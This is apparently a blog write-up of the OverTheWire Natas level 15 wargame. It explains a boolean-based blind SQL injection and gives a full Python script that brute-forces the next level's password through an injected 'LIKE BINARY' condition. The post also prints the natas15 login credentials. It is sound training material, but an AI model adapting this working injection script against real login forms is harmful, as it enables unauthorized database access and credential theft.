OverTheWire:- Updated Natas Walkthrough — Level 15

3 min readApr 6, 2024

Hello everyone, I would like to share how I solved Nastas CTF also Here is the updated password, I hope this write-up will be helpful.

hello Folks!!! it’s a samxia99
My Bio link:-https://beacons.ai/samxia99
Greetings everyone! I’m excited to share with you how I was able to successfully conquer a CTF challenge. Through this write-up, I’ll provide a clear explanation of my techniques and strategies, and I’m confident that it will greatly benefit those who are interested in CTF challenges. So, sit back, relax, and let me take you on an informative journey.

Just a quick reminder that the game has been updated, so the password has also been changed. I hope this password is helpful!

Natas Level 14 → Level 15

Here are the login details.

Username: natas15
URL:      http://natas15.natas.labs.overthewire.org

After logging in we can see this page.

let’s view the source code.

This level is Boolean Based on Blind SQL Injection. so we can solve this with SQL query. “username”: ‘natas16" AND password LIKE BINARY “‘ + “” We can put this query in a python script and brute force to get the password.
Here is the script make a .py file and brute force it.

import requests
import re

characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

username = "natas15"
password = "TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB"

url = "http://natas15.natas.labs.overthewire.org"

session = requests.Session()

current_password = list()

while(True):
 for character in characters:
     print("Trying with: " + "".join(current_password) + character)
     response = session.post(url, data={"username": 'natas16" AND password LIKE BINARY "' + "".join(current_password) + character + '%" #'},auth=(username, password))
     if "This user exists." in response.text:
      current_password.append(character)
      break
 if len(current_password) == 32:
  break